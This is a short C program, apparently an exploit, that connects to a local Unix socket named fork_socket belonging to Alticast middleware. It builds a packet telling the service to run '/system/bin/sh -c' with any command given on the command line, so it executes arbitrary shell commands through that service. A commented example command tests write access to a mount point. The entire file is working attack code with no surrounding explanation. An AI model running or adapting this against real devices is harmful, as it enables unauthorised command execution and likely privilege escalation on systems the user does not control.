#include <stdio.h>
#include<stdlib.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<unistd.h>
#include<sys/un.h>

int main(int argc, char** argv)
{
	int sock,ret;
	char buff[1024];
	struct sockaddr_un addr;
	char* ptr;
	int len;

	if( argc !=2)
	{
		printf("use arguemnt\n");
		return -1;
}
	printf("got %s\n", argv[1]);

	sock=socket(1,1,0);
	if(sock == -1)
	{
		printf ("socket error \n");
		return -1;
	}

	memset(&addr,0,sizeof(addr));

	addr.sun_family = AF_LOCAL;
	strcpy(addr.sun_path,"/var/alticast/fork_socket");


	ret = connect(sock,&addr,sizeof(addr));
	if(ret <0)
	{
		printf("connect error \n");
		return -1;
	}

	memset(buff,0,1024);
	buff[0]=4;
	buff[4]=1;
	ptr=&buff[5];

	strcpy(ptr+1,"/system/bin/sh");
	*ptr = (char) strlen(ptr+1) +1;
	ptr = strlen(ptr+1) + 2 + ptr;

	strcpy(ptr+1,"sh");
	*ptr = (char) strlen(ptr+1) +1;
	ptr = strlen(ptr+1) + 2 + ptr;

	strcpy(ptr+1,"-c");
	*ptr = (char) strlen(ptr+1) +1;
	ptr = strlen(ptr+1) + 2 + ptr;

	strcpy(ptr+1, argv[1] );// "touch /mnt/ddd/id");
	*ptr = (char) strlen(ptr+1) +1;
	ptr = strlen(ptr+1) + 2 + ptr;

	for(int i=0;i< 0x30;i++)
	{
		printf("%02X ", buff[i]);
	}

	len = ptr- buff;	

	printf(" len :%x\n", len);
	send(sock,buff,len,0);

	recv(sock,&ret,4,0);

	printf("done ret = %d\n",ret);

	return 0;
}